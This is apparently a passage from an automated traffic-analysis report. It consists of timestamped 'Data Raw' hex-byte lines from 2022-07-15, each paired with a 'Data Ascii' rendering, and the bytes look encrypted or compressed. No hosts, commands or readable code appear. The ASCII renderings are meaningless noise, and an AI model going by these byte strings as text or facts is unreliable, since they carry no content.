fc 91 d9 df 1a 30 39 eb 52 5e 00 4d 3a 90 89 d0 88 6d f0 44 3c a4 bc 33 d9 29 96 6f c0 09 66 ae 36 48 7f 0c 56 43 b4 33 a6 0d 18 1e b8 19 3b e7 7a ff 25
                                                                  Data Ascii: }%N,.#P<'=O%ZiAkTnA4rl"V$M`?7+[kxtIhU8tT__N8Qt6:_fPwpy$?z:>BLZwko0c3hB?#09R^M:mD<3)of6HVC3;z%
                                                                  2022-07-15 01:58:20 UTC1547INData Raw: 86 4b 65 96 8d bc 84 9d 83 ad b2 ed 57 77 c7 b1 5f da af f3 d0 4e 8b 0a 1a 74 ac 57 46 c5 49 7c e4 bf 99 c3 00 cb 6d 0f 0b 69 e0 bf 21 a4 9e ca 18 69 7f 94 57 79 df 78 7b cb d5 32 82 0b 93 99 5f 1e fe c8 18 8c 34 c4 d6 74 52 99 58 0d 8c 3d ea 1c 66 f5 26 87 d7 f0 4e 64 a2 40 5e e6 a0 48 f3 61 ba 5c da 10 1e 0d f6 47 1b 72 2a f1 14 80 3b 26 11 1c bb d0 05 57 e6 a1 68 cc c5 13 88 88 57 bb de 53 61 61 8c c1 0e 76 db 4b e2 40 b1 e8 6d cc ef 4a b9 e3 6c 38 58 cf 8a 91 ea 62 6e e8 94 42 39 7a 08 c5 c6 23 69 76 f8 e9 58 43 4b a7 07 25 c0 5c ba 44 18 eb ed ff 58 e0 d8 d3 69 c9 be 99 40 84 b6 89 be 80 d0 f9 f2 57 e9 2b d5 3c 69 30 24 90 10 d0 cf b2 e0 c6 c6 24 52 6b fd 1f 0d a9 93 bc 85 55 6f 4b 89 80 06 ea 45 3a a5 fe 72 66 81 03 9a d1 d2 13 c8 3a 8c 15 dd 75 63
                                                                  Data Ascii: KeWw_NtWFI|mi!iWyx{2_4tRX=f&Nd@^Ha\Gr*;&WhWSaavK@mJl8XbnB9z#ivXCK%\DXi@W+<i0$$RkUoKE:rf:uc
                                                                  2022-07-15 01:58:20 UTC1563INData Raw: 7d 88 fa f0 84 f4 52 67 3f fe 03 23 a6 f5 cd 11 5e b7 56 d6 e2 e8 dc 12 94 fa 1b 83 9a df 76 7f ac 4e 47 fa 59 b8 7b 49 91 57 b2 66 a7 d8 5d 11 dc ea 30 e1 95 de 61 f1 79 d7 8c 78 8e a4 76 3e 73 63 4f 24 64 2f 3d 95 be e0 d4 22 a9 4b ce 13 25 7b c5 23 d3 48 72 a1 ed d7 c1 4e 22 08 c5 53 9e 7f 6e 6e 38 e4 51 64 7b 6a a8 8b c4 61 1c a8 2e 2a 82 68 11 2b b4 3f 8e c2 cc 7a 9f ef 24 90 82 74 f0 b9 4e d6 2b b9 ee 95 b1 0d 82 13 43 d1 7a b7 0f 06 7c f1 dd 25 f1 b0 43 5e 77 69 35 cb c0 37 b6 1d 96 6d ea 19 83 3e 5e d9 5e a0 19 fc 2c 10 a8 75 34 7c e0 18 8f a7 cc a3 5c 82 52 f9 85 b4 3e 9b 75 f0 1e bb 10 b3 bf 7c fd 82 c3 67 6c dd 07 01 88 c2 37 a0 90 1b 14 5f 4e a1 b5 d3 9b 3d 95 a7 83 e3 0f c7 2f 6d cd 85 79 60 48 be 7d 33 8f 73 8d 38 ad f2 e1 65 f4 7a 77 9b c4
                                                                  Data Ascii: }Rg?#^VvNGY{IWf]0ayxv>scO$d/="K%{#HrN"Snn8Qd{ja.*h+?z$tN+Cz|%C^wi57m>^^,u4|\R>u|gl7_N=/my`H}3s8ezw
                                                                  2022-07-15 01:58:20 UTC1579INData Raw: 05 1f 1f 7f 0d 1d 83 c2 4f 6a d3 8d 66 8c d2 52 3f 71 6f 0f e5 b2 18 e3 51 95 5f 3d 70 ef da 7a e4 f0 85 58 b3 c2 47 ea b4 7f d0 f9 3c 73 81 f7 90 3e 8d 69 15 2b 03 32 66 b8 a0 cf 8d 3f 0a 27 d4 2e 76 1d fc e2 f6 74 0e 59 9e 23 83 94 57 c5 9d 5d fb 4b 7e 65 cc 7f db 1c d4 4d f5 52 aa 29 ef b6 20 26 b4 31 69 fc 1b 57 2c c6 ad ce a0 2d a7 2a 4e 6e a0 e7 83 0b 5f 42 6a ce 3c 01 32 08 de 33 02 09 49 5b b6 ad 95 99 ea a9 c5 f0 22 54 62 58 99 c4 d8 eb 7a 86 1a a5 39 6c c9 79 5f 05 b7 fa a8 50 6a f0 91 85 89 7f 11 fb d7 a3 2b 12 d0 af 7e a7 01 a4 16 9c cd 3c 66 2b 33 90 d3 20 75 ee 12 fb f7 2e 8e 78 68 ad 23 a2 b5 a0 43 81 aa 01 8d 28 4a a8 1c 7c 88 78 2d 11 2a c2 9a 3d 19 0f e7 b5 2d 34 24 ae 56 85 97 d3 af de 00 28 82 61 35 f0 34 ad 2a 44 a3 07 83 1d 32 f1 9a
                                                                  Data Ascii: OjfR?qoQ_=pzXG<s>i+2f?'.vtY#W]K~eMR) &1iW,-*Nn_Bj<23I["TbXz9ly_Pj+~<f+3 u.xh#C(J|x-*=-4$V(a54*D2
                                                                  2022-07-15 01:58:20 UTC1595INData Raw: 63 56 e0 8e 36 40 bc fc 65 73 68 53 4a 3b b6 04 21 32 39 30 9a d3 08 38 a2 3d c8 38 54 ce e9 33 3e 3a a7 d1 32 3e e0 17 5e 85 aa 7d bf 04 bc f8 ac fb 56 d1 78 ff aa 76 42 fc 8f 28 0e a6 91 e5 ab 13 8d 44 52 7b ff 0e 86 81 35 82 d3 bd ae de 61 8c 55 dd 8c 48 37 72 cb 53 8b 28 06 6a 50 fc 00 14 18 f3 f0 bd ca 43 e5 10 59 dc 02 81 b3 24 2e 70 b0 6a 69 f3 f3 07 f0 33 0f be ad 38 e9 90 dd 66 42 40 62 8f bc e2 a4 35 fd 4c 46 16 b3 52 a0 4b f5 7e 70 54 b7 07 35 c0 d9 9b 46 df ee 86 7f 34 89 42 e3 bc 4e 00 0d 58 e0 3b 76 d3 85 77 24 10 f9 4a 83 5e 5e 10 3f cd cb a9 23 ad 2a fe e0 3a 89 d4 3a 88 18 dd c5 f8 67 89 56 b6 f7 f0 00 8c 2c e1 10 d4 a4 47 10 53 99 f8 a8 5e fa eb 0c f0 7e 0c 14 00 f8 50 6d 8b 44 33 9a a9 ea c6 84 65 4d 8a cf e1 5f 75 ae 1b aa 36 ae b0 bf
                                                                  Data Ascii: cV6@eshSJ;!2908=8T3>:2>^}VxvB(DR{5aUH7rS(jPCY$.pji38fB@b5LFRK~pT5F4BNX;vw$J^^?#*::gV,GS^~PmD3eM_u6
                                                                  2022-07-15 01:58:20 UTC1611INData Raw: ea a0 3a f2 d4 51 c4 f3 83 df 62 87 5c ab fe 05 c2 1d 82 1a ac 73 a0 83 dc 52 c5 8b 76 12 72 be f9 db fa b6 37 4c 4e 5c a2 ef 32 e4 61 24 da 51 02 b2 5a d7 53 44 02 42 d1 e2 0f 93 e6 5e 07 25 58 b8 e7 30 7b de e8 c0 1a 24 e4 58 d5 c5 ee 4c cd a3 dd 08 65 eb 99 eb 20 3d 02 1f 06 5d bf 0f 3e bc be e2 ed 6c 4a 05 e1 53 ec f6 9e 24 41 61 e3 86 26 44 a9 cf b3 45 19 fd 2f 28 83 9e db a3 d4 af d8 1f 12 b1 58 0b 77 46 e5 73 b5 bf 6f b6 31 c5 ea c6 61 61 ee 9c d3 c2 5c fd f0 c8 99 bf 1d bb 1d 1a 3f 72 cc 3d 00 9b 8f 3b 8f f1 17 8c 74 da cf 8f e2 54 c4 a7 9b c2 1c 46 44 16 c0 84 51 a2 fe df 4e f4 cd f2 ba 9d f7 27 bc 27 45 a1 52 d3 22 c6 44 5e e9 b7 08 a5 03 d2 4b 57 60 db 2a 10 80 4b c2 0d e8 ff a9 45 99 de 27 41 98 ee b3 dc 15 11 4d dc cc 7a 64 ba f0 64 4c 0c ea
                                                                  Data Ascii: :Qb\sRvr7LN\2a$QZSDB^%X0{$XLe =]>lJS$Aa&DE/(XwFso1aa\?r=;tTFDQN''ER"D^KW`*KE'AMzddL
                                                                  2022-07-15 01:58:20 UTC1627INData Raw: 9a 34 1b b7 d8 5e 37 85 b7 fc fc ae e1 7a b7 40 d2 95 60 7c 9f 6c 8a a7 ca f5 7d 50 98 e7 4d cd 2b 3a 6a a6 1a 43 11 27 50 01 70 84 7f 3c cf c8 f9 9f 24 fb b9 07 95 fb d3 b3 d2 e5 b1 29 c9 95 ae 71 f6 66 a5 92 11 6e ac 2c 84 4d 0a 9d 69 39 e0 2a b7 88 8e d7 56 a4 9f 24 f9 fc 5f 15 0f 95 c6 35 7c 3a c5 76 91 44 74 59 86 cd 3d f9 36 2f ce fb 55 99 4c 18 85 40 6b f6 9a 0a 1a 15 07 c0 60 9b cd 1f a0 79 a9 3a 08 9c be db a0 70 2f d0 76 ec e5 dd 14 06 32 86 3c b9 0a ad 13 42 d0 47 c3 f8 18 bc 39 32 5e 6d 4e ef fe 04 7d c3 5e ad 4a 9c 5f 38 ae 48 34 ea 06 39 11 38 06 81 46 00 09 ca 1f d9 94 ce b8 2b c2 3b 5d 1c 48 be 0a bf d0 03 24 51 26 2b 94 30 34 d3 25 64 e6 8f 2c 54 42 5b 4d d9 67 4c 26 58 33 b6 7b 8b 9c 52 01 22 5b 2c 77 af 91 5c 0c 38 76 d6 e1 22 79 12 db
                                                                  Data Ascii: 4^7z@`|l}PM+:jC'Pp<$)qfn,Mi9*V$_5|:vDtY=6/UL@k`y:p/v2<BG92^mN}^J_8H498F+;]H$Q&+04%d,TB[MgL&X3{R"[,w\8v"y
                                                                  2022-07-15 01:58:20 UTC1643INData Raw: 78 1d 28 8e 19 d7 f0 ab d5 e4 c7 45 9e ca ab 9c 28 e5 e6 61 f9 61 13 38 0d e0 54 3e f8 7b 8d 69 d5 59 ca 78 2a 48 cf 40 46 bd fa 57 83 ff 00 dc 06 e3 7c 40 32 90 22 7b f6 39 de 04 55 ca cf d3 0a cd a9 a1 7d 3c a6 2f 1b 8d 62 94 42 c6 5e 60 81 eb c8 bb 89 78 e3 69 85 de bf 43 4e df 65 b3 d8 58 45 60 bb ee 77 4c ce d3 82 4f 55 91 47 5f 07 8a 32 17 cb 55 0a f2 38 74 1b 2a 97 d2 17 7d 7e f6 01 32 b0 12 ec a1 4d 56 77 41 75 92 f2 e0 aa 55 12 a3 76 ce d2 01 54 6c bb 2b 40 85 52 df 03 c4 09 0d 95 59 ef 28 34 01 c8 71 1d a7 f8 71 c3 22 7a 88 8b 72 6b 67 3c 11 8f f5 9c 13 5f b8 c4 74 b1 bd 52 b0 03 da 98 11 ad 2c dc aa 50 4d 6a b7 32 51 9c 3b f1 b8 cd 30 7b 86 b8 b2 4c 5f 81 23 6a 31 36 ef 99 e4 5a 99 7d 1b 82 2e fe 8c 77 29 48 a3 5b 94 91 f7 14 96 71 23 8d e1 01
                                                                  Data Ascii: x(E(aa8T>{iYx*H@FW|@2"{9U}</bB^`xiCNeXE`wLOUG_2U8t*}~2MVwAuUvTl+@RY(4qq"zrkg<_tR,PMj2Q;0{L_#j16Z}.w)H[q#
                                                                  2022-07-15 01:58:20 UTC1659INData Raw: 84 a7 0e 41 38 96 be 38 36 e9 a8 bd 53 10 b4 31 18 99 ca ef a8 37 fe 41 01 fd f9 80 d7 00 1b 8f b1 18 94 e1 b7 a9 81 8d e9 4b f9 54 98 14 38 29 c4 19 b6 7c ea 70 6e c4 79 98 c8 5d 06 86 22 4f 97 9f 16 f9 80 cd 77 c3 3f b1 a7 ad 77 f8 78 0b c2 76 33 5f 8f 5e 9a b1 a5 cb d2 52 91 6c 77 69 e0 7f 47 49 03 90 b6 99 51 a5 2b 05 b0 55 67 f6 0f f5 54 74 ad 7d 93 3c 80 fa 67 1b 14 7a 6e 63 f7 8f ec 0c c9 9b 30 d7 f4 41 aa d7 cd 4a fa 42 52 c0 16 43 0c f4 24 bc 99 1e f0 f3 9d 05 76 08 ea 7b 28 f4 21 c9 a3 b0 c9 1a f2 d2 a6 df 50 ed 93 41 2d 5c 02 d7 ad 3a d4 3c c7 64 b4 04 0a 4a 38 c7 7d 1b b6 ef c8 da d8 4d f7 06 79 d7 25 15 da 3f 49 f3 40 e0 56 5a 69 ed bc 31 1a e3 97 51 b3 60 6f 0d e0 e5 07 ba a8 64 67 85 69 4a 4d c0 1e e7 8d d9 be 3e 21 35 6f e5 38 d4 34 7c 21
                                                                  Data Ascii: A886S17AKT8)|pny]"Ow?wxv3_^RlwiGIQ+UgTt}<gznc0AJBRC$v{(!PA-\:<dJ8}My%?I@VZi1Q`odgiJM>!5o84|!
                                                                  2022-07-15 01:58:20 UTC1675INData Raw: 03 1c c5 22 f4 d8 10 17 0b b3 a4 47 96 b8 74 ad e7 26 04 c6 4f af 6b be 37 0b 6e a5 21 db 3b ac 14 ed 7f a2 b4 b2 ed 3f ca d1 09 f0 b2 44 a4 7a 1f 52 ca 14 28 55 34 ff f8 0f 87 18 b4 83 fc 8f 7f 71 2a dd dd f1 bb f2 e9 18 c2 85 22 4d 5e a4 91 fe 72 20 eb 18 22 c6 0e cd e2 f9 72 7c 48 f4 28 1b 34 42 ac dd 2d 06 51 ec 37 ff f9 84 6b a4 bb 87 d0 73 c5 33 2c 23 06 9c af 08 03 ea b1 26 2e 3b cc 7b 2d ad 4e 56 9f 2f 54 58 bc 53 c6 88 d8 48 05 95 ca 0d 33 cf 45 2d 16 22 b0 f9 e1 d6 a0 4a a2 34 c4 95 76 c6 65 ed 2e c5 96 53 d1 6e b5 47 7e e2 32 07 ba ab a4 ca 1b f7 0e 82 2b 4d a3 f7 bf f1 87 a7 88 4e d5 32 99 66 86 63 32 84 96 7d 9f a5 99 74 d4 97 84 f4 c1 53 c5 ac 31 a7 27 8f 3c 59 36 42 5b cc ad 0b c4 bc 15 18 9f 30 48 f2 d0 44 c0 66 ba 8c 86 04 1b 75 e5 a4 63
                                                                  Data Ascii: "Gt&Ok7n!;?DzR(U4q*"M^r "r|H(4B-Q7ks3,#&.;{-NV/TXSH3E-"J4ve.SnG~2+MN2fc2}tS1'<Y6B[0HDfuc
                                                                  2022-07-15 01:58:20 UTC1691INData Raw: 06 b3 05 96 87 f3 a7 e5 7b a7 2c cd a9 fb a4 94 5c 34 8a 1b 7e f0 57 fd 2b fb c5 a3 63 ae ca b5 a4 30 69 50 27 e7 b8 d3 6b 79 5b 3b a6 74 8e d0 5c 2f 43 75 d6 b2 79 13 f3 9c 31 3c 66 ab c8 c1 74 0a 45 df 73 b2 d7 0a 68 29 a8 49 67 5c db e2 e5 c0 5b 2b e3 13 24 d5 2c 11 5d 11 02 b8 59 51 85 2a 1c 70 d1 4a b2 ae 39 18 8b 72 5b ff 5a 87 a6 33 66 a8 83 e0 a6 0b 00 84 ff 9f 60 dd 4c 37 c2 8f d8 dc 18 e5 b9 58 57 e3 5b 52 bb 95 97 a6 61 3d 9e bb 92 70 a0 76 9b fb 6a 7b 40 84 d1 46 ff 02 a3 a9 47 c4 40 bd 82 ed 10 2f 08 ce c8 46 d0 b5 61 c1 62 f8 e4 b3 e2 c7 6c 90 f1 0f 94 96 55 04 20 7c f0 b7 f8 53 35 a7 b2 45 5b 82 56 2f 2d 32 1f 86 84 e0 db df 9a d9 c7 75 73 90 dd b1 ea 3a bf 67 fc 38 71 70 0a c3 a8 6f f7 50 bf ae c1 55 67 3f 76 0b 42 01 b3 f8 0c 1c 6f 55 cb
                                                                  Data Ascii: {,\4~W+c0iP'ky[;t\/Cuy1<ftEsh)Ig\[+$,]YQ*pJ9r[Z3f`L7XW[Ra=pvj{@FG@/FablU |S5E[V/-2us:g8qpoPUg?vBoU
                                                                  2022-07-15 01:58:20 UTC1707INData Raw: 53 e3 13 e6 66 1f ef 36 6b d8 55 48 65 8c ff 50 cb 46 16 39 58 38 13 ea 21 9c 25 aa ac 04 57 c8 10 41 7a 92 1e 51 3a 67 ae 8a 2d 24 a3 46 f6 f8 dd e4 3c 8c 82 ef 42 57 3a be 17 83 d0 b8 1e 41 38 8e 10 08 c4 ce 1e 61 77 53 e6 09 5e 6b 71 bb 15 af a3 38 da 3a ae 34 91 a3 e4 1f fc 11 fe b5 4b eb 6c 11 4c 4a e2 b7 cb f6 80 bf b7 82 d4 19 6c be cb 7d a9 db 49 bc f2 4b 02 4b a7 7a ec 05 51 bf d1 0e 5e 83 8c 8d 3d b8 20 f2 0a e9 44 ba 63 cd 98 f9 ec b0 51 5b f2 3a 10 10 03 82 f8 3d 9f 35 65 8b b0 80 d5 77 13 c5 a4 1d 40 15 4d 44 d3 57 ab ed f6 60 aa 9e b7 88 64 8d ac 0b 5a 55 66 7f 69 19 ea d6 31 e9 37 0a 1b 6d e5 1a 6c 61 e0 0c af 5e 9f 7b 56 2a 71 ab 50 65 e6 02 56 f7 c9 e6 b2 ae 04 37 71 be 18 08 8d f7 52 99 65 9a 97 fd 2f 19 02 9e 74 1c fa ef 76 d7 0c 26 d7
                                                                  Data Ascii: Sf6kUHePF9X8!%WAzQ:g-$F<BW:A8awS^kq8:4KlLJl}IKKzQ^= DcQ[:=5ew@MDW`dZUfi17mla^{V*qPeV7qRe/tv&
                                                                  2022-07-15 01:58:20 UTC1723INData Raw: 59 da f8 92 bb ec d5 c3 5c d8 27 5c c1 aa b7 fa c0 58 d5 8e a0 47 54 f9 67 0c b4 4e 34 b2 93 b0 c6 7d 3b 16 6e e7 91 0c 6a ee 03 90 db cf 3c e0 ac 2f 9a fe 18 86 21 43 6f dc 85 62 18 7d f7 c6 07 74 1e 6b 9e 3e 4a 34 eb 17 ef c9 72 9d 53 4d fa 5d 6e 2e 90 a1 19 ae 86 1a 43 5f 72 2e d5 e5 28 5d 11 a6 d9 1e 31 95 6f d0 54 34 20 7a cd 06 c1 11 22 b4 dc e0 aa d4 07 3c be 58 ea 89 aa 00 23 06 a2 00 18 90 11 85 28 9d 24 f3 01 6d 55 4c a5 82 51 ab 02 d9 48 36 ab ac 1f af 25 a0 26 70 c5 d9 87 5a 92 da 43 d1 0b 9b b3 22 f5 e5 68 52 cc cd 3c c8 7b e8 bb a8 b5 e6 b1 b3 a3 ec 3e 3f a3 f4 ac ad f1 d7 02 6d 94 20 27 f7 f8 15 b0 0b d5 13 9c 78 f6 8f e6 11 bd 6a 02 3c ff e5 a4 51 7c 7f ea 49 aa 3f 4c fe 12 5d 9f ea 5d 5b 39 b7 cf 44 dd 9c 0e c4 5e ae b0 77 4e 7b 82 af 26
                                                                  Data Ascii: Y\'\XGTgN4};nj</!Cob}tk>J4rSM]n.C_r.(]1oT4 z"<X#($mULQH6%&pZC"hR<{>?m 'xj<Q|I?L]][9D^wN{&
                                                                  2022-07-15 01:58:20 UTC1739INData Raw: c8 db 24 67 23 6b 15 82 8e ef dd 64 1f b3 3f 1a cc 21 10 b2 07 f3 fd d3 f0 58 58 e3 51 8d 6f 7f d5 55 80 81 a8 ca 48 fb c7 a4 19 54 be 38 ca e1 13 39 c4 c4 85 b2 f3 12 03 ed bc 16 59 71 a4 04 6f 3d 3e 3b 1d df e4 22 0e 9d 12 89 8b 6d 75 14 5d 58 85 10 28 55 87 1d de 20 c1 83 d5 9f 17 59 8f 8f 2c d9 d7 54 84 a4 dd 89 da ef 2f 9d 60 5a 36 42 9a 19 87 8c b8 aa e5 0c 47 3c bf 25 de 96 2d dc 3e 28 b3 c5 37 d2 d0 35 c6 e4 e1 95 3a 93 de 05 cd f4 fe b9 df 7f a3 66 08 39 b0 50 90 f1 e6 76 05 3b bf 45 cf 4e 8b cc 4e e4 35 bd a1 6b 30 be 99 80 62 3c 03 00 47 ee 0a 5a 3a 1c 8c 61 12 12 2b 39 9a f0 5a 80 5f 8d c6 db 00 55 1d 8a 84 cb 49 db 66 0f 59 ec 2b 5c 86 a3 f8 6e 4d 4e 37 61 3c 24 90 19 c7 a9 28 09 eb f9 87 03 39 64 54 5c c3 93 83 25 f6 5c 21 ca 3c f1 e8 29 29
                                                                  Data Ascii: $g#kd?!XXQoUHT89Yqo=>;"mu]X(U Y,T/`Z6BG<%->(75:f9Pv;ENN5k0b<GZ:a+9Z_UIfY+\nMN7a<$(9dT\%\!<))
                                                                  2022-07-15 01:58:20 UTC1755INData Raw: ed 25 61 03 2d af 1f 07 cb d5 f9 7e f6 ae 04 1d 74 fd 6f 1e 11 9d b7 d6 63 7d ac bb c8 15 4a 85 7c 0e d8 87 2b ec f7 fa 6a 08 25 5f d7 4f b3 10 69 bc f0 de 9b 20 8e 5a a1 16 e5 75 7a b2 1e e2 c2 e3 da cc 31 04 73 a8 8c 32 d8 8f a5 42 73 c5 fb e2 db f4 4d aa a6 7d a7 7e 49 3e c6 24 57 3f 8f 45 72 f3 57 d4 74 7d 9a 55 c3 8e fd 4f 36 04 0f 51 86 17 4c ef 9e 61 16 8e d1 dd 95 0f 8c 99 f2 30 c4 82 b4 4a 98 e6 ce 17 b1 9a 40 e9 fb c9 01 aa e2 80 14 3d b4 2c 3f fd 53 aa 49 aa 76 cd 04 99 69 a4 de 94 a3 c0 80 63 14 3f e3 5f 7c d0 94 06 08 b9 64 9f 79 dc 05 8b 0a 99 1f 01 52 c6 5a 52 65 02 1f 9e 42 32 75 f6 cd d6 b7 af 4c 4f 87 8b a9 95 4d 7b 56 1a e0 69 d8 71 e5 8f 06 bc 87 e0 64 7e 74 e8 ef b6 2e ea 32 6f e9 ab b2 59 39 a1 b9 ad f8 62 5c 3f 19 c8 ca 2f 64 34 39
                                                                  Data Ascii: %a-~toc}J|+j%_Oi Zuz1s2BsM}~I>$W?ErWt}UO6QLa0J@=,?SIvic?_|dyRZReB2uLOM{Viqd~t.2oY9b\?/d49
                                                                  2022-07-15 01:58:20 UTC1771INData Raw: a1 d3 d0 dd e5 ef f8 99 49 40 83 4a 01 bf 8c ea 7d 5e d3 06 09 0f 8a 91 4e 44 a2 7a 3a d5 1a 3b bf 52 fe 51 20 af b7 c5 8c 4f 49 0a a0 30 f1 f5 e0 0c 01 23 09 28 ad 5f 7a a6 0f 48 12 98 81 70 8d 4c 85 00 05 4a 63 d4 06 b9 72 6d 64 48 b9 20 14 bb 4a cd ac 4b c3 27 b8 f4 4a df 17 74 ab a6 a0 4b da 69 c0 f7 71 ae cf da e3 40 f8 79 90 d2 2b ef d9 c8 c6 25 f1 b8 96 69 19 98 19 34 49 45 6b 8c 95 17 73 46 16 b7 c5 ce 76 2f b9 db 66 a2 fa 42 22 3e d9 cc c8 25 95 c3 d3 c3 4a 5f 03 e5 91 2d 5f 28 80 8f c8 b2 9a f5 58 d1 46 f1 c9 9f af 70 19 aa c4 ac c1 c0 07 57 13 67 5a 1e 19 af dc d7 ee 9f 67 c3 3d 78 f5 8f a5 da 8e d5 10 20 a4 ba dc b2 84 4d f3 26 12 60 68 34 26 b9 75 ff 78 07 7d 98 72 cd a2 88 7d d5 07 cd c9 ba 47 8c 0d e7 e3 bc 2c 0c b0 bf 89 06 4f 01 18 97 a0
                                                                  Data Ascii: I@J}^NDz:;RQ OI0#(_zHpLJcrmdH JK'JtKiq@y+%i4IEksFv/fB">%J_-_(XFpWgZg=x M&`h4&ux}r}G,O
                                                                  2022-07-15 01:58:20 UTC1787INData Raw: ae 38 4e bc 7c 6a 78 af 63 a9 42 34 70 ba 85 74 04 b8 72 b8 e6 05 07 23 64 35 02 87 0e 09 89 56 fb 70 fe 68 5d 63 19 db db 17 2f 15 ed 5f 4c 57 8f 4a ef 05 72 b9 3a 72 ee 88 41 b8 c1 31 a0 9c 16 0a 32 5c 22 26 85 6e ff bf 5b 22 c1 4c 67 c9 59 c9 37 32 6b 66 ac 18 a6 57 63 8a 3e be 92 24 63 6e 08 08 e2 9a a8 7f 89 9e 7e 75 21 d8 3e be 3e 3f 29 7a 9b 05 65 0e 1c 5c 6a dc 80 39 b4 f1 30 20 7a 48 51 76 76 fc ea 25 9f 3f 00 89 52 c1 c9 1b f7 88 d9 b5 2a 11 65 47 3c 0e 24 39 e4 0c 45 f1 f9 fa 5c e9 d7 5a 25 2c a6 70 b8 50 73 95 72 a4 ef 0e 41 07 e0 3b 43 29 ee 96 dd 38 b2 82 7f 8e 0c ea 75 74 91 99 d3 45 15 7a b6 a9 03 52 d0 95 25 78 91 7f 5d 2a b9 f7 e0 f2 d4 9e d3 0f 93 a9 f6 e9 bd ca ce fb 27 c1 8d e0 39 7e 1b 27 9f 53 78 03 91 81 89 e2 c2 b7 c6 64 30 98 bc
                                                                  Data Ascii: 8N|jxcB4ptr#d5Vph]c/_LWJr:rA12\"&n["LgY72kfWc>$cn~u!>>?)ze\j90 zHQvv%?R*eG<$9E\Z%,pPsrA;C)8utEzR%x]*'9~'Sxd0
                                                                  2022-07-15 01:58:20 UTC1803INData Raw: 18 c4 66 23 c9 4c 93 66 35 4f 16 7b 84 d2 8c 27 26 24 8f dc dd 15 97 27 f0 fd ee d8 27 ed 79 81 3f bc ef 94 d5 89 3b 9f 1b df d6 40 72 7e 2c 3d 71 5c d7 b7 d2 6e ad a8 7d 96 82 4f 67 a5 30 77 69 e9 84 f8 a7 8f 6a 86 a4 7a 1e 65 eb 63 0d 7c 92 86 3b 57 30 65 e2 fb ab 35 57 bc 7d 6f 14 fc ea c4 ac d3 e7 9d 88 88 1f 7c 5b 13 2b a5 34 46 ba 4f e8 d7 bf ef f2 e2 1c 38 19 84 be 7e 9d 34 7e e0 a8 84 1f 09 5c 5f 4f 84 2e d2 19 df 47 c8 2b b8 15 0c cc 00 8e 84 36 f6 86 90 ae 9b 20 c6 25 30 b0 da a7 90 ea f3 38 3b b7 e8 7a 40 91 84 5a 10 ea 79 01 8b 6c 85 cd f7 82 8b b3 de 47 ed 53 06 0c b5 bf 75 d0 69 0e d1 99 59 28 81 71 5d ce a2 c4 d0 f3 0a 77 75 69 8f 47 dc ba a0 81 b9 3e 45 c1 f1 07 00 c4 ee 97 4e 75 39 04 b4 97 51 04 97 59 44 f5 71 bd 2a 42 9d 08 0b 24 84 cd
                                                                  Data Ascii: f#Lf5O{'&$''y?;@r~,=q\n}Og0wijzec|;W0e5W}o|[+4FO8~4~\_O.G+6 %08;z@ZylGSuiY(q]wuiG>ENu9QYDq*B$
                                                                  2022-07-15 01:58:20 UTC1819INData Raw: ba 0d e0 3a 26 e1 12 23 4a 0f a7 f1 6a 05 ae c9 40 be f9 9c 32 03 cd 88 79 4f d6 f2 92 7b 7d 77 f9 a0 c0 12 c3 b9 80 ea d4 b8 af 67 c8 92 45 0a 98 f1 9b a5 33 a6 46 c1 f1 93 dc ad aa 05 5f ea e0 94 a6 f7 ba 32 59 3f 14 40 b4 1a 9b 0e 83 c5 cb 97 22 46 2c cb e7 09 f4 c7 f7 70 6d d4 f8 1c bb b8 d3 a8 05 49 ed d9 3b 68 38 7f 84 b2 83 a2 a1 15 91 ce f0 bd dd de 7c a0 5c ec e3 a1 96 7c e2 76 1e af 30 d7 fc ad 38 cf ba 21 65 52 dd 7c f1 46 48 6f e8 45 b3 c2 63 44 e5 20 dd 14 4d ff 81 fb ad 79 59 01 fa a9 3c 90 cb bb 39 04 1e 71 bb e8 42 7d 82 77 76 7f 1b 7d 79 70 51 d9 66 74 5a e4 0f dc bb dc 6b 32 9a ec 4c f7 eb 30 77 4e 02 25 8a 7e 0a 90 b2 c7 57 2e 93 29 5a 24 2a 98 15 a8 22 aa 81 52 80 05 d8 bc 47 2a 87 a7 0d c3 8d 5a 39 7d 3b e5 b5 20 7b da 23 07 c2 fa be
                                                                  Data Ascii: :&#Jj@2yO{}wgE3F_2Y?@"F,pmI;h8|\|v08!eR|FHoEcD MyY<9qB}wv}ypQftZk2L0wN%~W.)Z$*"RG*Z9}; {#
                                                                  2022-07-15 01:58:20 UTC1835INData Raw: 29 d6 7e fd 1a fc c3 d3 c7 af 4e cd cc 33 56 ae b2 35 9c bb c8 f5 ca 34 03 a5 8a b9 ad 48 bf f4 3a 4f 1a e4 f8 64 cd eb 10 6c 2c 70 0a d1 78 50 4e 0c 66 90 89 3b 7b 81 22 68 35 d1 7e 39 93 2c 66 f8 6e 46 16 34 f8 7c ae 26 9c 0d 73 3b b8 a6 5e 88 9f 55 d1 fe d0 a8 e2 66 e9 73 b6 4e 3a cc 5a 34 e7 b8 14 b6 02 c3 8f 9d 4f 01 ad ad c7 44 cf 81 15 a6 d4 fc cb 33 d7 c8 85 b4 35 2d fb 83 45 9c c5 8a b8 17 fe 3c ee dc dc cb fc 0f c9 2f 7f 6c 62 64 2c 6c 96 3c 28 ee 4b 21 44 f8 93 b8 71 d9 34 dd 9d 41 0e 29 4d 54 50 69 c4 46 3c c5 de 93 84 57 df d6 b4 d8 98 19 a1 6c 2b b1 2b e1 8f 0c 50 c0 b0 93 9f 1c 7c fc 15 55 8e 2d f5 8d dd 60 ae bf 29 05 4b 0e 7c 35 e8 ba ad 06 55 1c 35 d0 2a c3 46 bd 81 93 e5 8a d8 73 e3 39 98 9f f7 f7 3a 6e c5 ea 92 08 98 fc 01 85 dd e1 70
                                                                  Data Ascii: )~N3V54H:Odl,pxPNf;{"h5~9,fnF4|&s;^UfsN:Z4OD35-E</lbd,l<(K!Dq4A)MTPiF<Wl++P|U-`)K|5U5*Fs9:np
